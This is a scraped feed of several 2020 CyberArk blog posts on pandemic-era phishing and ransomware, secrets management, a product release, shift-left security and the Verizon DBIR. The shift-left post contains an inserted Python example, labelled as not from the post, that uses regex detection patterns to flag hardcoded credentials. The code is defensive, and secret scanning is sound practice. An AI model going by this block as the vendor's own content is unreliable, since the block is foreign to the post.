If you’re looking for more in-depth guidance beyond the CSA’s initial recommendations, tap into these actionable steps for protecting privileged access in cloud environments.

Cyber Attacks in the Pandemic Era: More of the Same https://www.cyberark.com/blog/cyber-attacks-in-the-pandemic-era-more-of-the-same/ Wed, 08 Jul 2020 13:00:17 +0000 https://www.cyberark.com/?p=95487

Since COVID-19 began to spread rapidly across the globe, we’ve seen near-constant headlines of cyber attacks hitting organizations in the midst of chaos. An elite group of cyber criminals launched a sophisticated phishing campaign in mid-March, trying to break into the World Health Organization (WHO) and access critical systems and applications. One of the largest hospitals and COVID-19 testing facilities in the Czech Republic was hit by an attack and forced to cancel operations and relocate patients to other hospitals. Meanwhile, spikes in financially motivated attacks seemed to peak as the United States confirmed its first case of COVID-19.

Warren Buffett once said, “Don’t let a good crisis go to waste.” Cyber attackers have long subscribed to this mantra, and it’s clear from the past few months that they are continuing to follow this approach. An FBI lead described these trends as a “collision of highly motivated cyber threat actors and an increase in opportunities.”

But while some threat actors ramped up efforts to maximize profits amidst the crisis – nothing has substantially changed in their approach.

In fact, new Microsoft research indicates that malware attacks linked to coronavirus were “barely a blip” in the total volume of threats it typically sees each month. The global nature and universal impact of the crisis simply made cyber criminals’ work easier. Microsoft notes the attacks peaked in March, then plateaued into a new normal. While these attacks are still more frequent than in January and February, the vast majority of the threat landscape, according to the Microsoft study, has settled back into business as usual: “typical phishing and identity compromise patterns.”

Attackers continue to use the same tried-and-true methods that worked for them long before 2020: find a way in, then target privileged access to unlock doors and get to where you want to go. It’s in that spirit that we wanted to examine attackers’ favorite intrusion technique – phishing – and a popular malware choice – ransomware.

Phishing: Gaining a Foothold Through Social Engineering

Cyber attackers are the ultimate psychologists. They carefully study human behavior and reverse-engineer our digital footprints to uncover what makes us tick – and what makes us click. They understand that people crave order and safety (they just want to do – and keep – their jobs) and that they are curious and want to stay informed. Phishing preys on these basic human needs and remains highly effective. It’s the number one form of socially driven breach, according to the 2020 DBIR. Attackers simply need to re-skin these tactics to align with the crisis or story of the day.

Take the Office 365 phishing attacks, for example. In early May, reports emerged of a phishing campaign that hit high-level executives using Office 365 at more than 150 businesses. A number of similar attacks have been reported, as executives and employees alike work from home.

While these attacks, in and of themselves, are nothing new – attackers often create fake, malicious Microsoft 365 login pages to trick email users into entering their credentials – we’ve observed a “twist” to this approach in recent months that targets temporary tokens (aka access tokens) that are generated to allow Single Sign-On (SSO) for Microsoft 365 and all Microsoft applications. By stealing and using these temporary tokens, attackers can bypass Multifactor Authentication (MFA) and persist on the network by “legitimately” refreshing the token. What’s more, even if a user changes their password, the token remains valid and cannot be revoked.

Video and chat apps – like Microsoft Teams, Slack, WebEx, Zoom and Google Hangouts – have become the new face of the organization during this time of remote work. Attackers have added these cloud-based applications to their phish list, using the same general techniques they’ve used with email since forever.

Within these SaaS apps, they can easily distribute malicious files, code and even GIFs to scrape user data, steal credentials and even take over entire enterprise-wide accounts. (Read more about this in the CyberArk Labs team’s research piece, “Beware of the GIF: Account Takeover Vulnerability in Microsoft Teams.”) Or, by compromising employees’ digital identities – particularly those of privileged users like sys admins – attackers can develop persistence and siphon sensitive data from these collaboration tools – daily reports, financial data, IP and more.

As organizations onboard more cloud applications and services to support their remote workers, we can expect to see more innovations like these from attackers. But, at the end of the day, it’s still phishing. Enforcing least privilege, credential theft protection and application control across endpoints – whether they’re at home or the office – is critical.

Ransomware: Attacks of Opportunity

Ransomware has always been most effective when targeting critical and time-sensitive information. As the pandemic surged, reports of ransomware targeting hospitals and healthcare providers underscored the dangerous – even deadly – consequences of these attacks. Understanding that downtime can spell the difference between life and death, cyber criminals have long targeted these critical organizations, knowing that they will often pay out hefty ransoms to get operations back and running quickly.

During this time, attackers extended their sights to a new sector – research and development and biotechnology companies working fast to find a coronavirus cure. For example, Reuters reported that nation-state attackers targeted staff at U.S. drug maker Gilead Sciences after it announced a Phase 3 Trial of an investigational antiviral drug. According to Reuters, in one instance, a fake email page designed to steal passwords was sent to a top executive. As more organizations progress their vaccine research, cybercriminals with varying motives have increased attacks.

As they compete with other nations to find a cure, and also inform their own country’s response, nation-state APT attackers are launching RDP attacks or targeting workers’ endpoints in search of privileged credentials to establish a foothold and move laterally. From there, they can maintain persistence on the network and steal sensitive research little by little. In some cases, they may wait weeks or even months for the “perfect moment” to deploy ransomware to further exploit these victim organizations. Microsoft research shows how criminal groups are using popular strains, like Robbinhood, Maze and REvil, to carry out “long-tail” ransomware attacks.

R&D and biotech organizations are particularly vulnerable, since they’ve not been targeted heavily in the past and many are still maturing their security programs. But, while these industries may be the target du jour, no organization is safe from ransomware. It’s a widely used attack vector that continues to grow in popularity thanks to risky work-from-home habits and the rise in ransomware-as-a-service.

What’s changed most during this time of uncertainty is the narrative. Security incidents and breaches linked to COVID-19 are amplified by frenetic news coverage and constant social media chatter. The public, hungry for information and updates, is drawn to the drama – and headlines of sophisticated scams and ruinous ransomware have delivered on that. As a result, security is now at the forefront of conversation.

So, Now It’s Your Turn: Don’t Let a Good Crisis Go to Waste

We’re not out of the woods yet and there’s still much to be learned, particularly as organizations consider permanent changes to remote work policies. But this first phase has revealed some important truths about the way people behave and work and how businesses need to adapt for this new reality.

Now is the time to scrutinize your security practices – particularly how you’re protecting privileged access – and chart your path for change. By taking this opportunity, you can protect your organization from future loss and strengthen your security posture to ensure long-term success.

How Security Islands Prevent Effective Secrets Management https://www.cyberark.com/blog/how-security-islands-prevent-effective-secrets-management/ Thu, 02 Jul 2020 14:19:08 +0000 https://www.cyberark.com/?p=95302 Secrets Management

The past few years have been an exciting time for the tech industry. The DevOps revolution has led to increased adoption of Kubernetes. Modern software development toolkits enable developers to easily and consistently build, deploy and scale applications – while keeping a record of all configurations as code.

We’ve also reached the point where – thanks to some prominent data breaches – we recognize that security can’t be an afterthought; it is an important consideration of its own. This realization has led to a greater focus on what secure, cloud-native software development looks like.

Because there was frequent data loss in the early days of DevOps, often due to credential mismanagement, many of the tools that grew out of the advent of DevOps now have their own systems for secrets management. When you use multiple tools to build, deploy, configure and maintain your applications and they each have their own mechanisms for managing security policies and access control, you end up with what we call “security islands”:

A security island is:

A tool or platform that comes with its own built-in security components (that manage secrets, access control, audit, compliance, etc.), but does not facilitate interoperability with other tools and/or aggregation of security policies, management and audit data.

A security island is an isolated subsystem that makes it harder to manage the security of your system as a whole. This can happen when a tool doesn’t have well designed security features like fine-grained access control or detailed transaction audit. It may not securely store data at rest or may not be designed to be interoperable with other tools. Whatever the cause, the result is the same: implementing security for the suite of tools associated with the security island must happen piecemeal and without any centralized oversight.

When your systems are set up so that you’re forced to deal with security islands, you suffer from a lack of consolidated audit and access control and it’s difficult to delegate authority to manage subsystems in any standardized way. You also lack a centralized view of your entire security landscape, which makes it increasingly difficult to manage at scale. Here is an example to illustrate what this might look like in practice:

You use Jenkins CI/CD pipelines that need one set of credentials to deploy applications to staging servers and run tests and another set of credentials to deploy the applications to production. Once the applications are deployed, each individual app or service will need its own credentials to connect to production databases and APIs.

Your Jenkins server can be set up to store the test and production deployment credentials in Jenkins secrets or the credentials plugin. When your apps are deployed to production in AWS, you can use AWS Secrets Manager to store the database secrets and API keys.

This may work initially, but if this becomes just a little more complex, it can quickly prove to be too unwieldy to scale and manage all your security through your DevOps tools. Not only do you now lack an ability to easily delegate, manage and audit, but you’re also struggling to securely scale your team’s applications. If that’s not bad enough, the situation can get even worse.

Consider another team deploying their applications to the same staging and production environments using their own CI/CD. How do you keep the keys consistent across both environments? How do you manage rotation and ensure that only the people and applications that need those credentials are able to access them?

And, as your team’s applications gain increased market traction and you start deploying to multiple clouds for resilience and disaster recovery – you’ve just added yet another security island. Bottom line, as your team’s apps become more successful, the security posture worsens.

In addition, if security is too complicated, teams will choose their own security tools and processes that are outside of official policies. This is a kind of human security island that is often referred to as “Shadow IT.”

Getting to a Better Place

The modern pipelines we’ve created are well designed to improve flow and velocity and to enable us to ship our code, but they are not always built for security. The benefits of these interconnected systems are real and we’re not going to get away from having suites of disparate tools. We can start to improve the experience of managing them when we have technology that enables us to tie them all together.

So, how do you escape from the security islands and weave your tools together in a way that connects them with your established systems of trust?

When you have a way to operate without security islands you get the benefit of centralized audit, access control and administration. It’s easy to delegate authority and to manage at scale. You have the benefit of a centralized view of your overall security landscape and how the individual machines and services interact with each other.

To manage privileged access for applications throughout the software development lifecycle, you need a system that lets you define your entire infrastructure, declare who and what can access which resources, audit all connections that are made and monitor for unusual behavior.

In practice, you want the system that you use for centrally managing application privileged access to enable you to:

  • Automate granting machine identity to applications and processes (like CI servers)
  • Deploy applications so that they are prepared to seamlessly authenticate with the resources they need
  • Centrally manage access control
  • Reduce complications for developers so that Shadow IT is no longer necessary

On the Conjur team at CyberArk, our mission is to create just such a centralized system for managing application privilege in dynamic environments. We built Conjur’s policy engine so that you can put the principle of least privilege into action, and make sure that only the applications and users that should be accessing credentials are able to retrieve them.

We make it easy to onboard new applications and to deploy applications configured to connect to Conjur by providing platform integrations that work with the native properties of platforms to identify apps and avoid the secret zero problem altogether. We make it simple for applications to access the secrets they need, or do away with the need for secrets entirely with Secretless Broker. If you’re interested in learning more, please visit us at conjur.org or join us on the CyberArk Commons!

Top 5 Features of v11.5: Flexibility for the New Normal https://www.cyberark.com/blog/top-5-features-of-v11-5-flexibility-for-the-new-normal/ Tue, 30 Jun 2020 19:22:06 +0000 https://www.cyberark.com/?p=95002 Privileged Access Management

The world is changing rapidly and privileged access management (PAM) is no exception. Today, we released the latest version of CyberArk Privileged Access Security Solution (v11.5), which contains several new features to help organizations adapt to the new landscape of remote work.

As organizations learn to practice risk distancing, many are now accelerating their digital transformation initiatives by introducing new applications, devices and critical IT assets. Unfortunately, these changes also introduce new risks – many of which organizations are simply not prepared for. Attackers know this, so it shouldn’t be a surprise that cyber attacks are on the rise. Malicious actors are seeking to profit from the rush to enable business by compromising newly created human and machine identities – especially those that possess privileged access.

The latest version of the CyberArk Privileged Access Security Solution was created to help customers address the challenges of this new normal by reducing risk, simplifying operations and improving business agility.

It’s a jam-packed release, but here is a quick summary of the latest features:

  1. Enhanced Audit Visibility for Linux Systems

In the world of remote work, maintaining visibility into the actions of privileged IT administrators with session isolation and management is as important as ever.

Several new features in version 11.5 improve the audit of managed privileged sessions to Linux systems. PAM teams can now view active SSH sessions, including executed commands, in the monitoring page of the web portal. Additionally, text recording of keystrokes is now available for privileged sessions through programmatic access via automation tools like Ansible as well as privileged sessions to Linux machines for just-in-time access using short-lived SSH certificates.

Organizations need holistic solutions to help ensure accountability, whether through a just-in-time or a more traditional approach to privileged access. Collectively, these enhanced audit capabilities help our customers simplify audit and compliance requirements for privileged sessions to their Linux systems, whether in the cloud or on-premises.

  2. Simplified Session Management and Secure Access to Third-Party Apps

The latest version of the CyberArk Privileged Access Security solution also makes it easier than ever before to add Privileged Session Manager connectors that isolate and monitor privileged sessions to third-party applications and devices. This is particularly important as organizations rapidly introduce new tools to facilitate remote work. Version 11.5 offers over 150 trusted and certified session management connectors in the CyberArk Marketplace, which collects integrations with our technology partners in the C3 Technology Alliance.

CyberArk admins can now onboard and manage new connectors directly from a new Platform Management view. This eliminates the need for CyberArk end users to download and manually configure new connectors – reducing human error and saving time. The new Platform Management view also facilitates adoption of session management by ensuring all admins have access to the connectors needed to securely access new infrastructure.

  3. Suspected Credential Theft Detection in Microsoft Azure

CyberArk’s threat analytics capabilities can now automatically detect suspected theft of passwords for Identity and Access Management (IAM) accounts in Microsoft Azure cloud environments and allow CyberArk customers to automatically remediate these events by alerting security teams and rotating the credentials.

With support for suspected credential theft for both Azure and AWS, customers can now extend Privileged Access Management capabilities to more of their cloud estate.

  4. Multi-Cloud and Multi-Region Support for CyberArk Vault Deployments in the Cloud

CyberArk customers can now deploy CyberArk Vaults across multiple regions and multiple availability zones within one cloud provider and across multiple cloud providers for AWS and Azure.

This enables customers to deploy their primary Vault in AWS and their disaster recovery Vault in Azure or vice-versa. Customers can also deploy their Vaults in two separate AWS or Azure regions or two availability zones within the same region for increased availability. These additional deployment options add flexibility, redundancy and availability for customers that are rapidly moving to cloud and multi-cloud environments.

  1. Simplified Configuration of Ransomware Protection with Endpoint Privilege Manager

Finally, the latest release also includes enhancements to Endpoint Privilege Manager, CyberArk’s solution for securing privileged access on the endpoint. We’ve updated the user interface to simplify tasks including configuration of Ransomware Protection policies to help defend remote employees against savvy cyber criminals developing new strains of ransomware. Meanwhile, simplified installation for macOS also allows organizations to quickly protect new devices from ransomware attacks.

Necessity is the mother of invention. Organizations everywhere are developing innovative solutions to the problems posed by the new world of work and we’re excited to help them do so securely.

Curious to learn more? Contact us for a demo and learn why over 5,400 customers trust CyberArk to deliver comprehensive privileged access management functionality across their enterprise.

]]>
Shift Left to Successfully Secure Your Apps https://www.cyberark.com/blog/shift-left-to-successfully-secure-your-apps/ Thu, 18 Jun 2020 15:42:13 +0000 https://www.cyberark.com/?p=94568 Shift Left

“Shift left” is a well-known concept for security teams working with software developers. In the simplest sense, it means introducing security at the earliest possible point in the software development lifecycle (SDLC). To understand why this is crucial, especially right now, it’s important to consider a few key points about the software development lifecycle.

It All Starts With the Development Process

Let’s take a quick look at the software development life cycle (SDLC). For a typical development environment, the SDLC reflects how code is developed and eventually put into production. The app lifecycle starts with planning, followed by coding, creating a build, testing and then releasing, deploying and running the new application in production.

Responsibilities across the lifecycle are shared between different teams. Developers primarily write and test the code, while DevOps and Ops are typically responsible for building the systems through which the code flows into production. Security is in the mix too, but too often not brought in until the code is already in production.

Given there are separate development (dev) and production (prod) environments, it might seem like security can just focus on securing the production environments. However, with the increase in the use of automation technology, that is no longer a viable strategy. Many of the development processes are automated by tools such as Jenkins, which runs the CI/CD (Continuous Integration/Continuous Delivery) pipeline, or Ansible, which automates putting code into production.

Now, because of automation, not involving security until deployment is simply too late. Critical security decisions have already been made without security’s guidance, and altering these decisions can be time-consuming. Security needs to “shift left,” involving itself earlier in the development process to ensure that each step of the SDLC can be secured from the start.

Shift Left to Include Security At All Stages of the Development Process

How does security make the shift left to embed security early in the process? There are a lot of different ways to incorporate security, but one of the most critical steps to take to eliminate vulnerabilities is to remove hardcoded credentials, secrets and access keys from application code. These are the powerful credentials used by applications to access databases, cloud platforms and other sensitive resources.

We’ve all heard the horror stories of a developer embedding credentials in code and using a code repository for version control without realizing that the repository they thought was private was actually public. Instead of hard coding these privileged credentials in the application, they should instead be secured, managed and monitored by a secrets management platform and only accessed by applications when needed. Code repositories are very widely used, but with secrets management, even when code is inadvertently made public, there are no credentials to be exposed.

One challenge when removing hardcoded credentials is that developers have to code their applications to fetch the passwords and credentials needed to securely access the resource. While it is relatively easy to replace the hardcoded credential with a simple API call early in the development process, it will require considerable rework if you wait until after credentials are hardcoded into the application. A huge potential hassle for developers – but something which can be easily solved by having security teams engaged with developers early in the development lifecycle.
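As an added example (not code from this post or from CyberArk), here is a small pre-commit style scanner that flags the kinds of hardcoded credentials the post warns about, run over a constructed "before" module, beside the fetch-at-runtime pattern the post recommends. The `fetch_secret` callable, the `secrets_client` module and the secret name `prod/db/app-user/password` are assumptions standing in for a real secrets-manager API.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

# Regexes for common hardcoded-credential shapes. Constructed for this example;
# a production scanner would carry a much larger, tuned rule set.
SECRET_PATTERNS = {
    # name = "literal"  where the variable name looks like a password/key/token
    "assigned_secret": re.compile(
        r"""(?i)(?:password|passwd|pwd|secret|api[_-]?key|token)\w*\s*[:=]\s*['"]([^'"]{8,})['"]"""
    ),
    # AWS access key IDs have a fixed 20-character shape
    "aws_access_key_id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    # scheme://user:password@host  (credentials embedded in a connection URI)
    "credential_in_uri": re.compile(r"""\b[a-z][a-z0-9+.-]*://[^:/\s@'"]*:([^@\s'"]+)@[^\s'"]+"""),
    # PEM private key material pasted into source
    "private_key_block": re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----"),
}


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    kind: str
    redacted: str  # never carry the full secret into logs or CI output


def redact(value: str) -> str:
    """Keep only a 2-char prefix so a finding can be located without re-leaking it."""
    return value[:2] + "..." + f"({len(value)} chars)"


def scan_source(path: str, text: str) -> List[Finding]:
    """Return one Finding per (line, rule) hit. Lines tagged '# allow-secret' are
    skipped so reviewed false positives (e.g. test fixtures) do not block every commit."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if "# allow-secret" in line:
            continue
        for kind, pattern in SECRET_PATTERNS.items():
            m = pattern.search(line)
            if m:
                value = m.group(1) if m.lastindex else m.group(0)
                findings.append(Finding(path, line_no, kind, redact(value)))
    return findings


def pre_commit_check(staged: Dict[str, str]) -> List[Finding]:
    """Scan every staged file; a non-empty result means the commit should be rejected
    before the credential ever reaches the repository (the 'shift left' moment)."""
    results: List[Finding] = []
    for path, text in staged.items():
        results.extend(scan_source(path, text))
    return results


# --- the pattern the post recommends instead: fetch the secret at runtime ---

def build_db_config(fetch_secret: Callable[[str], str]) -> Dict[str, str]:
    """`fetch_secret` is a hypothetical stand-in for a secrets-manager client call.
    The credential is resolved when needed and never appears in source or git history."""
    return {
        "host": "db.internal",
        "user": "app",
        "password": fetch_secret("prod/db/app-user/password"),  # assumed secret name
    }


# Constructed "before" module with three hardcoded credentials (all values are fake;
# the AKIA value is the example key from AWS's own documentation).
SAMPLE_BEFORE = """\
import psycopg2

DB_HOST = "db.internal"
DB_PASSWORD = "hunter2-prod-2020"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
CACHE_URL = "redis://:s3cret-cache@cache.internal:6379/0"
TEST_PASSWORD = "not-a-real-secret"   # allow-secret  (test fixture, reviewed)
conn = psycopg2.connect(host=DB_HOST, user="app", password=DB_PASSWORD)
"""

# Constructed "after" module: the same code with the secret fetched at runtime
# through a hypothetical client module.
SAMPLE_AFTER = """\
import psycopg2
from secrets_client import fetch_secret

DB_HOST = "db.internal"
conn = psycopg2.connect(host=DB_HOST, user="app",
                        password=fetch_secret("prod/db/app-user/password"))
"""

if __name__ == "__main__":
    hits = pre_commit_check({"app/db.py": SAMPLE_BEFORE})
    for f in hits:
        print(f"{f.path}:{f.line_no}: {f.kind} -> {f.redacted}")
    print("commit blocked" if hits else "commit allowed")
    print("after refactor:", pre_commit_check({"app/db.py": SAMPLE_AFTER}) or "clean")
    # dict-backed stand-in for the secrets store, only for this demonstration
    cfg = build_db_config({"prod/db/app-user/password": "fetched-at-runtime"}.__getitem__)
    print("db user:", cfg["user"], "(password resolved at runtime, not in source)")
```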

Partner and Engage with Developers to Address Security

Developers too often view security as a roadblock, especially if they jump into the process late. Developers also may not fully understand the specific security needs and approaches and may think they can handle it themselves. If you want to get security and DevOps teams to work together smoothly, here are a few practical steps to consider:

  1. Transform your security team into a DevOps partner, by first developing some of the basic skills to understand the development process, so that you can communicate to the development team in their language.
  2. Work with your DevOps counterparts to establish enterprise requirements for securing secrets and credentials.
  3. Help developers understand the security vulnerabilities and the challenges that come with addressing them. Communicate the vulnerabilities in terms that developers can more easily relate to, such as the recent Kubernetes or Docker vulnerabilities. Once they fully understand what it means to be responsible for security — handling compliance and audit requests, securing the human credentials for the DevOps tools, maintaining the secrets management platform and so on – they’ll be eager to hand off those responsibilities.
  4. Make it easy for developers and their code to consume secrets with APIs or out of the box integrations with popular tools, so they can incorporate security into their code without impacting velocity.
  5. Avoid security becoming a bottleneck. Consider offering self-service solutions, such as an automated approval process that enables developers to request security policy updates that allow their apps to access secure resources.

With these steps, many security teams work very successfully together with development teams and build security into their processes. It’s important to recognize that incorporating security early is a journey and even small steps are important.

Want to learn more about how to incorporate security earlier in the development process? Check out our webinar, Securing DevOps 101: “Shift Left” with Security into the Development Workflows, or review The CISO VIEW: Protecting Privileged Access in DevOps and Cloud Environments, which is packed with guidance from CISOs from Global 2000 organizations.

]]>
You’ve Heard of Social Distancing? Now Try Risk Distancing https://www.cyberark.com/blog/youve-heard-of-social-distancing-now-try-risk-distancing/ Tue, 16 Jun 2020 19:38:51 +0000 https://www.cyberark.com/?p=94410

In recent months, social distancing has played a star role in virtually every aspect of our personal and professional lives. Most of us are working from home. In short order, parents were transformed into teachers and full-time caregivers – many times in addition to their full-time jobs. A quick walk down the street requires careful planning: Facemask? Check. Hand sanitizer? Check. Virtual gatherings have replaced social engagements.

It’s hard to imagine when — or if – life will ever settle back into “normal”, but regardless, social distancing is now part of our lexicon. But what about risk distancing? While social distancing is about following recommended best practices to avoid catching or spreading COVID-19, risk distancing is a reminder to follow best practices for security to mitigate risks of an attack.

The risk landscape has also changed dramatically in the wake of the novel coronavirus. Companies rushed to onboard new applications and services to make remote work possible. Risky work-from-home habits are putting critical business systems and sensitive information at risk. For instance, according to a recent survey, 77% of remote employees use unmanaged, insecure “BYOD” devices to access corporate systems, and 66% of remote employees have adopted communications and collaboration tools with known security vulnerabilities like Microsoft Teams and Zoom. Meanwhile, opportunistic cyber criminals have increased their attacks – from targeting RDP servers to launching sophisticated ransomware – in an effort to capitalize on this uncertain time.

Organizations are challenged in how best to quickly and adequately address infrastructure and productivity needs and recognize the necessity of risk distancing. This is especially true when it comes to securing privileged access for remote workers on distributed corporate endpoints.

Practice Risk Distancing In the New Normal

According to CNBC, industries including technology, financial services and insurance have invested in remote work tools and there’s no indication they’ll be returning to the old way of doing business. As more organizations extend work-from-home policies for the long term, security teams should take a hard look at existing cybersecurity programs and priorities to determine if they are still adequate for the changing landscape.

We have curated a collection of resources to help you shape new strategies that effectively balance security and productivity, better prepare your organization for the future of work, and drive safe and responsible risk distancing for your own organization.

Check out our Risk Distancing Resource Center to learn why privileged access management (PAM) is one of the most effective ways to protect critical assets, workstations and remote user access. Review best practices, watch informative “Ask The Expert” videos and take advantage of free CyberArk trials and tools that can help identify and mitigate privilege-related vulnerabilities within your environment.

Ready to practice risk distancing? Read some of our latest blog posts to help guide your next steps, including:
]]>
Verizon DBIR 2020: Credential Theft, Phishing, Cloud Attacks https://www.cyberark.com/blog/verizon-dbir-2020-credential-theft-phishing-cloud-attacks/ Tue, 09 Jun 2020 20:36:53 +0000 https://www.cyberark.com/?p=93733 Credential Theft and Privileged Access Management

Every year, the security industry at large eagerly awaits the release of the Verizon Data Breach Investigations Report (DBIR). Now in its thirteenth year, the DBIR is widely considered to be one of the industry’s most respected sources of cybersecurity data.

This year’s 119-page report covers a lot of ground, but of course, our team was particularly drawn to insights linked to privileged access and credential abuse. Here’s a look at five themes that stood out:

1. Macro Cybersecurity Trends: Money Is the Number One Motivator

The vast majority of data breaches (86%) were for financial gain, and as such, 72% involved large businesses. Seventy percent of breaches were caused by external actors, with organized crime accounting for more than half (55%). These attackers are homing in on personal data: 58% of breaches involved this – nearly double the number from a year ago.

When it comes to attacks, three methods account for 67% of all breaches: credential theft, social attacks (such as phishing) and errors. What’s most intriguing about this “attack trifecta” is that 17% of all data breaches were caused by seemingly innocuous human mistakes—representing a 50% jump from 2019.

As businesses adapt to new realities, attackers are shifting away from malware-based attacks to highly targeted ransomware that offers strong lateral movement capability, and ultimately, massive payouts. Report authors note, “Other attack types such as hacking and social breaches benefit from the theft of credentials, which makes it no longer necessary to add malware in order to maintain persistence.” According to the report, 27% of malware incidents were ransomware and the threat is growing in part because ransomware-as-a-service is so easy to purchase and use.

But the DBIR isn’t all doom and gloom. There are some encouraging developments. For example, organizations are getting much better and faster at detecting breaches: 81% were discovered in days or less.

2. Privilege Misuse by Authorized Insiders Highest in Healthcare

This year, Verizon analyzed “privilege misuse” through the specific lens of authorized insiders. The DBIR defines privilege misuse as “intentional actions undertaken by internal employees that result in some form of security incident.” While this analysis does not account for privileged access abuse linked to external actors (who are responsible for 70% of all breaches) or third parties across the supply chain, it does illuminate potential dangers within an organization’s own ranks.

Eight percent of all breaches were caused by privilege misuse by employees. Healthcare “remains the industry with the highest number of internal bad actors, due to greater access to credentials.” Manufacturing and finance sectors follow close behind.

3. Phishing and Credential Theft Are Rampant in the Work-from-Home Era

According to the report, phishing remains the top form of social-driven breach and “schemes are increasingly sophisticated and malicious” as remote work surges. Meanwhile, the use of stolen credentials by external actors is on a meteoric rise. More than 80% of breaches tied to hacking (the number one threat action) involve the use of lost or stolen credentials or brute force.

While these findings are not new or surprising, the DBIR reminds us that attackers nearly always take the path of least resistance by using this tried-and-true approach: start with a phishing scam (96% arrive by email) targeting a user’s endpoint, then easily crack weak passwords or steal credentials stored on the device. Using these credentials, the attacker can move from workstation to workstation in search of sensitive data to steal and privileged credentials (such as local admin rights) that enable escalation to higher-value assets and information.

4. Cloud-Based Data Is Under Attack

Credential theft is a pervasive problem everywhere and the cloud is no exception. The DBIR highlights a year-over-year two-fold increase in web application breaches to 43%. Stolen credentials were used in over 80% of these cases.

As cloud adoption accelerates, attackers are turning to cloud-based data as a “quick and easy route to victims.” Cloud assets were involved in nearly a quarter of all breaches of which 77% involved breached credentials.

5. Misconfigurations Put Everything in the Cloud at Risk

Errors won the award for best supporting threat action this year (second only to hacking). Humans have always made mistakes, but the report suggests things are getting worse as “internal end users and system admins make errors as though they were paid to do it.”

Notably, more than 40% of all error-related breaches involved misconfigurations. These happen when a person (usually a system admin or someone with privileged access) spins up a datastore in the cloud without proper security measures in place to protect the data from unauthorized privileged access.

Attackers can abuse misconfigurations to compromise a single privileged user, then move to compromise a cloud management console, or worse, take full control of the organization’s cloud environment. And, as recent headlines show, your misconfigurations will find you out. The report warns, “There are security researchers out there who spend their time looking for just this kind of opportunity. If you build it, they will come.”

The 2019 Verizon DBIR is based on an analysis of 32,002 security incidents and 3,950 confirmed breaches sourced from cases across 81 countries and 16 sectors. Want to dig in deeper? You can find all the details, including industry- and region-specific attack patterns and trends, in the full report. And to learn how to secure privilege to stop attacks, visit here.

]]>
5 Steps to Reporting PAM Outcomes https://www.cyberark.com/blog/securing-success-reporting-pam-wins-back-to-the-business/ Fri, 05 Jun 2020 14:48:18 +0000 https://www.cyberark.com/?p=93634

The director of Identity and Access Management (IAM) is fundamentally responsible for ensuring controls are in place to protect access to sensitive assets within the organization. This includes all aspects of identity, access and authentication for the entire workforce and also applies to Privileged Access Management (PAM), which is what we’ll be focusing on in this blog. Specific accountabilities within this role typically include setting strategy, defining a PAM-based risk framework, designing and implementing appropriate access controls and providing monitoring, reporting and mitigation strategies around overall risk.

Executive reporting is essential in providing transparency around the state of risk within the organization and to demonstrate progress with PAM-based programs as they serve to continually reduce that level of risk. This type of reporting can be delivered in the form of key performance indicators (KPI), which are updates tracked and compared to a specific framework of goals, and Key Risk Indicators (KRI), which serve as a mechanism for monitoring risk reduction.

Scorecards and dashboard tools are often leveraged to help visualize the metrics that are used to capture the effectiveness of risk mitigation programs. These metrics are key to providing comprehensive reporting back to executives, lines of business and various oversight functions (i.e. risk management, audit and regulators). However, determining the appropriate level of reporting for each audience is often difficult. One important piece that requires careful consideration is to convey a specific message amongst all the data. And, for that message to hit home, it has to be tailored to the needs of the recipient.

These five fundamental steps can help establish your program, define your risk tolerance and report on your outcomes.

Define a PAM Risk Mitigation Strategy

Defining a comprehensive PAM strategy is a critical step to establishing the key risks you need to mitigate for your organization and how to prioritize your program’s activities. It is informed by the enterprise cyber security framework, emerging threats, industry trends and oversight requirements. A sound PAM strategy allows you to develop a risk mitigation plan, a roadmap for privileged access and a target operating model (TOM) that helps ensure the long-term sustainability of your controls.

Designing your PAM model will not only provide you with a long-term view of your risk mitigation strategy, but it will also allow you to consider short-term quick wins, such as delivering PAM controls that provide rapid risk mitigation with the least amount of effort – both technically and politically.

Figure 2. Risk prioritization methodology quadrant, CyberArk Blueprint.

IAM leaders should explore the CyberArk Blueprint, a PAM framework that provides prescriptive guidance and best practice recommendations for PAM development. It comprises three guiding principles that make it easy to articulate the value of the PAM work that’s being executed on and why it’s important. This framework provides actionable risk reduction, which can be turned into a customized plan and roadmap that is then captured and included as part of your metrics reporting.

If you don’t have a PAM strategy and roadmap, your reporting does not provide any meaningful insight into the effectiveness of your risk mitigation activities. Although your reporting will continue to demonstrate some degree of progress, it will not be aligned to an overall series of goals and objectives; therefore, it won’t reflect a true risk posture.

Establish a Baseline of Privileged Controls

You can’t protect what you don’t know exists. To protect privilege within your enterprise, it is essential to understand the current state of privilege within your enterprise. This includes the inventory of assets within your operating environment and the array of privileged accounts that are used to support them. Privileged accounts and credentials can be found everywhere – extending across Active Directory, *NIX, IaaS, PaaS, SaaS, SQL and many other IT, OT and business services. It’s important to scan systems on your network and cloud providers on a regular cadence to uncover privileged accounts, credentials, entitlements and misconfigurations that can pose a risk to your organization.

The data generated from inventory will enable you to assess your level of risk based on your PAM framework and establish a set of targets and priorities for your implementation schedule. It will provide you with a set of numbers (i.e. 15 Windows domain accounts, 2500 Windows server local admins, etc.) that will not only define your remediation strategy but will also establish a set of metrics that can be measured and reported against going forward.

One best practice to consider is integrating your PAM solution with vulnerability management and discovery technologies from vendors like Rapid7, Forescout and Tenable. This serves two purposes: providing security for the privileged credentials used to automatically sign in to sensitive infrastructure environments and, at the same time, providing valuable insights into asset- and credential-based information that can help inform your migration strategy.

The only thing worse than having risk is not knowing where you have risk or how extensive that risk is!

Evaluate the Strength of Existing Controls

Defining your PAM strategy and framework establishes your risk goals and tolerance. Meanwhile, your baseline of privileged controls delivers an inventory of both privileged accounts and technology assets. Understanding the state of the existing controls that protect privileged accounts and sensitive information within your assets is critical to defining the next steps of your action plans. Consider the following:

  • Existing governance and policy language around privileged accounts and asset management
  • Policies and procedures around provisioning, including gating, automation and signoffs
  • A complete review of privileged accounts, roles and responsibilities and entitlements that ensure they are appropriate
  • Security technology controls to protect, detect and monitor access
  • Continuous assessment and testing on a regular basis to validate and remediate the strength of controls

